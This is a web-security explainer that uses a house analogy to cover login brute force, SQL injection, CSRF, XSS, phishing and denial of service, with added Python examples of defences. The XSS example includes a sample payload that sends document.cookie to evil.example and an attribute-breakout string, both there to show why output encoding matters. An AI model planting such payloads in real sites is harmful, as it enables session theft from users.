Secure Your Application Development like Your Own House

By | July 5, 2017

An easy way to think about the security of a web application is to imagine your own house. It has a front door, windows and a back door, a number of rooms, a roof, fences and various paths in. Only the terminology is different.
The front door:
The gateway of a web application is the login page and, not surprisingly, it is the most common point of attack. A login page consists of input fields for a username and password and a button that sends them to the server, which authenticates you and grants access to the rest of the application. Some login pages add a captcha to make sure a human, rather than an automated script, is submitting the form. Without such a check, an attacker can copy your login form, drive it from their own server, and submit it over and over with different usernames and passwords until one combination works. This is a brute-force (or credential-stuffing) attack, and it is like a thief trying key after key in your front door.
A captcha is a distorted image of letters and numbers that an automated script cannot easily read. Unfortunately, as scripts have become better at reading these images, captchas have had to become more complex and harder for humans to read as well. The result is end-user frustration: repeated failed attempts to log in because the captcha was unreadable. A common complement is a secure form token. The server generates a random token for each session, keeps it server-side, and places it in a hidden field on the form; a submission is accepted only if the token it carries matches the one issued for that session. A form copied to, or submitted from, another site does not carry a valid token, so its submission is rejected. Be clear about what this does and does not buy you: it defeats forged submissions from other origins (cross-site request forgery), but a script that first fetches your login page obtains a valid token, so the token alone does not stop password guessing. Guessing has to be handled by rate limiting, account lockout or growing delays after repeated failures.
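The hidden-field token described above, as an added example that is not part of the original article: a random per-session token is issued with the form and checked in constant time on submission. The in-memory SESSIONS store, the form markup and the `/login` action are assumptions standing in for a real framework.

```python
import hmac
import re
import secrets

# Constructed in-memory session store standing in for a real one (assumption).
SESSIONS = {}


def new_session():
    """Start a session and bind a fresh random token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf": secrets.token_urlsafe(32)}
    return sid


def render_login_form(sid):
    """Emit the login form with the session's token as a hidden field."""
    token = SESSIONS[sid]["csrf"]
    return (
        '<form method="post" action="/login">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="username">'
        '<input name="password" type="password">'
        '<button>Log in</button></form>'
    )


def token_from_page(page):
    """What a client (or a script that fetched the page) sees as the token."""
    m = re.search(r'name="csrf_token" value="([^"]+)"', page)
    return m.group(1) if m else ""


def accept_login_post(sid, form):
    """Return True only if the post carries the token issued for this session.

    The comparison is constant-time so the check leaks nothing about the
    token through timing; a form mocked up on another site cannot know
    the victim's token and so fails here.
    """
    sess = SESSIONS.get(sid)
    if sess is None:
        return False
    submitted = form.get("csrf_token", "")
    return hmac.compare_digest(submitted.encode(), sess["csrf"].encode())
```

Because `token_from_page` recovers the token from any fetched copy of the form, an automated guesser that starts each attempt by fetching the page passes this check; that is exactly why the token must be paired with rate limiting or lockout.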
The windows and the back door:

What are the windows of a web application? I do not mean the operating system on the server. I mean the places on each page that could be broken open to get in. These are the input fields and text areas that let the user enter information. An attacker types database commands into them instead of ordinary data. If the software builds its database queries by pasting that input into the query text, the input is executed as part of the command when the data is stored or looked up, so the attacker's commands run with the application's database privileges. Typical results are destruction of the database, theft of its data, or exposure of other users' information. This attack is known as SQL injection.
Boundary fences:
The boundary fences of a web page are its links, its editable areas and the page URL itself. A link or the URL of a page can be copied onto another site and modified so that a logged-in user who follows it unknowingly makes your server perform an action on their behalf; this is cross-site request forgery (CSRF). JavaScript can be inserted into editable areas (a comment or profile field, say) so that it runs in other users' browsers, where it can submit their data to a fraudulent site or take control of their session; this is cross-site scripting (XSS). Database commands can likewise be injected through parameters in the URL. An XSS attack is often used to steal the session identifier of an authenticated user, which lets the attacker act as that user and, if the user is an administrator, gain a higher level of access to other accounts.
To prevent cross-site scripting, the software must treat everything a user can edit as data: validate it on input and encode it on output so that the browser renders it as text, never as code. To prevent forgery, every URL and form that changes something must carry a secure token that the server checks. Like holes and gaps in a fence, all of these must be closed. And every protected page must check that the request comes from a verified user before doing anything.
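The output-encoding step above, as an added example that is not the article's own code: the same two attacker inputs rendered once by pasting them into the page and once through HTML escaping. The comment text, the search parameter and the page fragment are constructed; the cookie-stealing payload is the classic shape of an XSS attack and is assumed for illustration.

```python
import html

# Constructed attacker inputs (not from the article).
COMMENT = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
SEARCH = '" autofocus onfocus="alert(document.cookie)" x="'


def render_vulnerable(comment, search):
    """Pastes user input straight into the page: the browser executes it.

    The search term breaks out of the value="..." attribute and adds an
    event handler; the comment lands in the page as a live <script>.
    """
    return (
        f'<input name="q" value="{search}">'
        f'<p class="comment">{comment}</p>'
    )


def render_safe(comment, search):
    """Encodes on output. quote=True also escapes the quote characters, which is
    what stops the attribute breakout; escaping only <, > and & would not."""
    return (
        f'<input name="q" value="{html.escape(search, quote=True)}">'
        f'<p class="comment">{html.escape(comment, quote=True)}</p>'
    )


def has_injected_markup(page):
    """Crude check used only to show the difference: a raw script tag or an
    event-handler attribute that originated from user data."""
    return "<script" in page or 'onfocus="' in page
```

Encoding has to match the context the data lands in: HTML body and attributes are handled here, but data written into a JavaScript block, a URL or a CSS rule needs that context's own encoding.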


Imitation:

We have all met bogus callers at the door claiming to be from the gas or water company and asking for access to the house to turn something off. Website attackers do the same: they contact you or other users of your site by email, social network or phone and talk you into revealing your credentials. A typical story is that your site has been hacked and can be fixed if they are given access. The only prevention is to remind your users constantly not to reveal their username and password to anyone, and that you as the site owner will never ask for their password. You must also give users a way to reset a forgotten password themselves, by emailing them a link containing a random, single-use token that expires after a short time, so that nobody ever needs to hand a password to another person.
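The emailed reset link just described, as an added example that is not the article's own code: the server stores only a hash of a random token together with an expiry, puts the raw token in the link, and accepts it once. The in-memory RESETS store, the 15-minute lifetime and the `https://www.example.com/reset` path are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlencode

RESET_TTL_SECONDS = 15 * 60   # assumed lifetime of a reset link
RESETS = {}                   # user -> {"hash": ..., "expires": ...}; constructed store


def issue_reset_token(user, now=None):
    """Create a single-use token for `user`. Only its hash is stored, so a
    leaked database dump does not yield working reset links."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    RESETS[user] = {
        "hash": hashlib.sha256(token.encode()).hexdigest(),
        "expires": now + RESET_TTL_SECONDS,
    }
    return token   # goes into the email link only; never log it


def reset_link(user, token):
    """The link placed in the email (hypothetical path)."""
    return "https://www.example.com/reset?" + urlencode({"user": user, "token": token})


def redeem_reset_token(user, token, now=None):
    """Accept the token once, and only before it expires."""
    now = time.time() if now is None else now
    rec = RESETS.get(user)
    if rec is None:
        return False
    digest = hashlib.sha256(token.encode()).hexdigest()
    if now > rec["expires"] or not hmac.compare_digest(digest, rec["hash"]):
        return False
    del RESETS[user]   # single use: a replayed link fails
    return True
```

Because a valid link lets its holder take over the account, the link must go only to the address already on file, and the reset page should not reveal whether a given username exists.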
Input of brute force:

The easiest and quickest way for a burglar to break in is to kick the door open or put a brick through a window.
The high-tech version of this is the Denial of Service (DoS) attack. The attacker requests a page over and over, or sends requests designed to be expensive to serve, until the web server runs out of memory or connections and stops responding to legitimate users.
While the number of burglars is falling, the number of hackers is rising. A burglar is usually only after financial gain; a hacker's motive may be political, financial or simply malicious damage. An unprotected house may never be burgled, but an unsecured website will eventually be attacked.
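One application-level defence against both the brute-force login attempts and the request flood described in this section, added here as an example and not from the article: a sliding-window limit on requests per client. The limit of 20 requests per 10 seconds and the two sample clients (one sending one request a second, one sending fifty a second) are constructed for the demonstration.

```python
from collections import defaultdict, deque


class RateLimiter:
    """Allow at most `limit` requests from one client in any `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)   # client -> timestamps of served requests

    def allow(self, client, now):
        q = self.hits[client]
        # Drop timestamps that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


# Constructed traffic sample (client address, arrival time in seconds).
REQUESTS = (
    [("10.0.0.5", float(t)) for t in range(10)]          # 1 request/s, normal user
    + [("203.0.113.9", i * 0.02) for i in range(500)]    # 50 requests/s, flood
)


def apply_limit(requests, limit=20, window=10):
    """Replay the sample through the limiter; return per-client served/dropped counts."""
    limiter = RateLimiter(limit, window)
    served, dropped = defaultdict(int), defaultdict(int)
    for client, t in sorted(requests, key=lambda r: r[1]):
        if limiter.allow(client, t):
            served[client] += 1
        else:
            dropped[client] += 1
    return dict(served), dict(dropped)
```

A limiter like this protects the application from a single abusive client and slows password guessing; a distributed flood that saturates the network link has to be absorbed upstream, by the hosting provider or a content delivery network, before it reaches the web server at all.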
